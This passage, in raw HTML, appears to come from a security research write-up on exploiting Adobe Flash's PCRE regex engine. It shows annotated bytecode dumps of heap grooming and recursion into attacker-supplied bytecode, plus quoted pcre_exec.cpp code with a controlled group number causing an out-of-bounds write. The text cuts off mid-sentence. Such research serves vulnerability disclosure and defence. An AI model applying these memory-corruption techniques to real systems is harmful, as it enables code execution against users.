vertical-align: baseline; white-space: pre-wrap;">000c</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">201b</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">32 PLUS </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">['\x1b']</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">000e</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">80 </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">128 INVALID</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">000f</span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 54000b </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 84 KET </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[11]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0012</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5c0006</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">92 ONCE </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [6]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0015</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">510083</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">81 RECURSE</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [131] <---- this 131 is the bytecode index to recurse to (131 == 0x83, at the start of our groomed heap buffer)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0018</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">540006 </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 84 KET </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[6]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">001b </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">54001b </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">84 KET </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[27]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">001e</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">00</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0 END </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">… </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">GROOMED HEAP BUFFER</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0083</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5e00880002</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">94 CBRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [136, 2]</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0088 </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">540088 </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">84 KET </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[136]</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">When we execute this regex, things look good for us, since the execution path we’ll take is the following:</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0000</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5d001b</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">93 BRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [27]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0003</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">66</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">102 BRAZERO</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0004</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5e000b0001</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">94 CBRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [11, 1]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0009</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1bc290 </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">27 CHAR </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">['\xc2\x90'] <---- Fail, backtrack</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0015</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">510083</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">81 RECURSE</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [131] </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0083</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5e00880002</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">94 CBRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [136, 2] <---- Now executing inside our groomed heap buffer </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0088 </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">540088 </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">84 KET </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[136]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0018</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">540006 </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 84 KET </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[6]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">001b </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">54001b </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">84 KET </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[27]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">001e</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">00</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0 END</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So, at this point we can happily insert arbitrary regex bytecode in between our CBRA and KET in our groomed heap buffer.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The PCRE bytecode interpreter is surprisingly robust; and it took quite a while before I found a useful primitive for corrupting memory from this point. The majority of memory accesses from the interpreter are validated; if not perfectly (there are a lot of opportunities for out-of-bounds reads, or similar, but at this point we really need a write primitive) then sufficiently to prevent an out-of-bounds write that we can leverage further.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">There is, however, an interesting piece of code; in the handling for CBRA, there is a bad assumption made about the group number (second parameter of the opcode). Code snippet below</span><span style="font-family: Arial; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;"> (from </span><a href="https://github.com/adobe-flash/avmplus/blob/master/pcre/pcre_exec.cpp" style="text-decoration: none;"><span style="color: #1155cc; font-family: Arial; font-size: 15px; font-style: italic; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">pcre_exec.cpp</span></a><span style="font-family: Arial; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">, beautified and some debug code removed)</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">case OP_CBRA:</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">case OP_SCBRA:</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">number = GET2(ecode, 1 + LINK_SIZE);</span><span style="font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><---- we control number</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">offset = number << 1;</span><span style="font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><---- we control offset</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">offset < md->offset_max</span><span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">) </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><---- bounds check that offset within offset_vector</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">save_offset3 = md->offset_vector[md->offset_end - number];</span><span style="font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><---- we control number, so if number is 0, we index at md->offset_end, which is one past the end of the array</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> save_capture_last = md->capture_last;</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (ES3_Compatible_Behavior) // clear all matches for groups > than this one</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> { // (we only really need to reset all enclosed groups, but</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> // covering all groups > this is harmless because</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> // we interpret from left to right)</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> savedElems = (offset_top > offset ? offset_top - offset : 2);</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (savedElems > frame->XoffsetStackSaveMax)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (frame->XoffsetStackSave != frame->XoffsetStackSaveStg)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> (pcre_free)(frame->XoffsetStackSave);</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> frame->XoffsetStackSave = (int *)(pcre_malloc)(savedElems * sizeof(int));</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (frame->XoffsetStackSave == NULL)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> RRETURN(PCRE_ERROR_NOMEMORY);</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> frame->XoffsetStackSaveMax = savedElems;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> VMPI_memcpy(offsetStackSave, md->offset_vector + offset, (savedElems * sizeof(int)));</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> for (int resetOffset = offset + 2; resetOffset < offset_top; resetOffset++)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> md->offset_vector[resetOffset] = -1;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> else</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> offsetStackSave[1] = md->offset_vector[offset];</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> offsetStackSave[2] = md->offset_vector[offset + 1];</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> savedElems = 0;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">md->offset_vector[md->offset_end - number] = eptr - md->start_subject;</span><span style="font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><---- even better, we write the current length of the match there; this is becoming interesting.</span></div> <br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So, we can write some data we control one dword past the end of </span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">offset_vector</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">. As it happens, normally </span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: 